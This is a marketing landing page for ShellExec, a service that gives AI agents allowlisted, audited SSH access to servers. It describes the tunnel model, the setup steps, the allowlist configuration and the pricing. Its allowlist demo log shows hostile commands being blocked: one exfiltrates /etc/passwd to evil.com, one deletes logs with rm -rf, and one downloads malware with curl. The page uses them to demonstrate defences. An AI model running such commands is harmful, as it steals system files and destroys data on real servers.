Now live

Your AI agent.
Your servers.
Zero keys stored.

ShellExec gives Claude, Cursor, and any AI agent secure SSH access to your infrastructure — via MCP or REST API. No keys uploaded. No trust required. You hold the kill switch.

Access exists only while your agent runs. Stop the process — access is gone.

Create free account See how it works →

Free tier · No credit card · Works with Claude, Cursor, curl, Python

shellexec — mcp + rest api
# via AI agent (MCP)
You: "The prod API is slow, investigate"
→ ssh_exec top -bn1 | head -20
→ ssh_exec journalctl -u api --since '30m ago' | grep ERROR
→ ssh_exec systemctl restart api-worker
✓ allowed — matches allowlist rule: systemctl restart api-*
Claude: "Stale worker at 94% CPU. Restarted. All normal."

# via curl (REST API)
$ curl -X POST https://api.shellexec.io/exec \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"server":"prod","command":"df -h"}'

{"stdout":"50G total, 12G used","exit_code":0}

Security model

Three properties.
Each one independent.

Most SSH tools ask you to upload your private key and trust their encryption. We designed something different — a model where each layer limits the blast radius of a breach on its own.

🔑
Keys never leave your server

Your agent dials out to us over a WebSocket — we never dial in. Your SSH key stays on your machine, is never transmitted, and is never stored. ShellExec cannot see it, even if we wanted to.

Zero-trust tunnel
📋
Only allowed commands can execute

Set allowlists per server — right down to which URLs curl can hit, which systemctl verbs are permitted, and which flags are blocked. Commands are validated by the agent before execution. The cloud cannot override it.

Agent-enforced allowlists
You hold the kill switch

The tunnel only exists while your agent process runs. Stop the daemon and access is gone instantly — no credentials to revoke, no support ticket to raise, no firewall rules to update. It's connection-existence-gated access.

$ systemctl stop shellexec-agent
✓ access revoked immediately
📖
Every execution is logged

Full audit trail — command, output, timestamp, which agent, which server, which token. Not just what ran, but what was blocked and why. You see the full picture, including what your AI agent tried and wasn't allowed to do.

Semantic audit log

How it works

Up and running
in five minutes.

One command installs the agent. One config line points your AI at it. Everything else is just telling your agent what to do.

// Zero-trust tunnel architecture
Your server ──outbound WS──► tunnel.shellexec.io:443 // your server initiates
│ agent holds persistent connection
│ no inbound ports required
│ works behind NAT and firewalls
└──
AI Agent ──► api.shellexec.io ──routes down tunnel──► agent executes
// SSH key never transmitted  ·  command validated against allowlist before execution  ·  output returned
01 —
Install the agent

One command on your server. The agent connects out to ShellExec over a secure WebSocket — no inbound ports, no firewall rules, no SSH keys to paste anywhere.

curl -sSL https://shellexec.sh/install.sh | sh -s -- --token=YOUR_TOKEN
02 —
Name your server

Your agent registers with a label you choose — prod-web-01, staging, homelab. ShellExec assigns a unique ID. If you clone a VM, the new instance gets a new identity automatically.

03 —
Set your allowlist

Define exactly what commands are permitted on each server. Regex patterns, glob matching, URL domain rules for curl. The agent enforces this locally — the cloud cannot override it.

04 —
Add one config line

Point your MCP client at your ShellExec endpoint. That's the entire setup. Your AI agent can now address any of your registered servers by name.

{ "url": "https://mcp.shellexec.io/YOUR_TOKEN" }
05 —
Tell your agent to act

"Check disk space on prod." "Restart nginx on staging." "Pull the last 50 error logs." Your agent calls ShellExec, which routes the command down the tunnel and returns the output.

06 —
Every command is logged

Full audit trail with the command, output, timestamp, server, and agent. Blocked commands are logged too — so you can see what your AI tried and wasn't permitted to do.

Command allowlists

Your infra, your rules.
Down to the URL.

Restrict what any AI agent can do — by server, by command pattern, right down to which domains curl is allowed to hit. Read-only on prod. Full access on staging. You decide.

prod-web-01  ·  allowlist config active
# /etc/shellexec/allowlist.yaml

commands:
  - pattern: "df -h"
    exact: true

  - pattern: "systemctl (status|restart) nginx"
    regex: true

  - command: "curl"
    allowed_domains:
      - api.yourservice.com
      - s3.amazonaws.com
    flags_blocked: ["-o", "--output"]
agent enforcement log live
df -h
  matched exact rule

systemctl restart nginx
  matched regex: systemctl (status|restart) nginx

curl https://evil.com/exfil?data=$(cat /etc/passwd)
  blocked: domain not in allowlist

rm -rf /var/log
  blocked: no matching rule

curl -o /tmp/malware https://api.yourservice.com/x
  blocked: flag -o is not permitted
Note on enforcement
Allowlists are validated by the agent process running on your server — not by ShellExec's cloud. This means even if someone compromised your ShellExec account, they could not execute commands your agent wouldn't permit. The two layers are independent.

vs self-hosting

Skip the setup.
Keep the control.

Open-source SSH MCP servers exist. But they run locally, need manual setup, and only work from your machine. ShellExec is the version you don't have to maintain.

Self-hosted ShellExec ↗
Setup Clone repo, install Node, configure SSH paths One install command per server — done
SSH key storage Credentials in a local config file Keys never stored — tunnel model, zero uploads
Works from Your machine only Anywhere — shared across your whole team
Command allowlists None out of the box Per-server, agent-enforced, URL-aware
Audit log None out of the box Every execution + every blocked attempt
Kill switch Delete config file manually Stop the daemon — access gone instantly
Updates You manage it when it breaks We handle updates and uptime

Why I built this

I kept copy-pasting commands from Claude into my terminal, then pasting the output back. It was insane. ShellExec is what I wished existed: my AI agent gets temporary, audited, allowlisted shell access to my servers — and zero keys ever leave the box. I run it on my own infra.
TL
Toby Lockyer
Founder · ShellExec

Pricing

Simple pricing.
Start free. Upgrade any time.

Prices shown in GBP. Auto-converted to USD, EUR, AUD, CAD or JPY on signup.

Free
Get started
£0 / month
Perfect for kicking the tyres.
  • Up to 5 servers
  • 500 executions / month
  • Full audit log
  • MCP + REST API
  • Zero-trust tunnel model
Start free →
Pro
For solo operators
£7 / month
For devs running real infrastructure.
  • Up to 50 servers
  • 10,000 executions / month
  • Command allowlists
  • Email support
  • 30-day log retention
Upgrade to Pro →
Plus
For teams
£23 / month
For teams managing fleets.
  • Unlimited servers
  • Unlimited executions
  • Command allowlists
  • Priority support
  • 90-day log retention
Upgrade to Plus →

Give your AI agent its own SSH access.

Free tier includes 5 servers and 500 executions a month. No credit card.

Create free account

No credit card · Cancel any time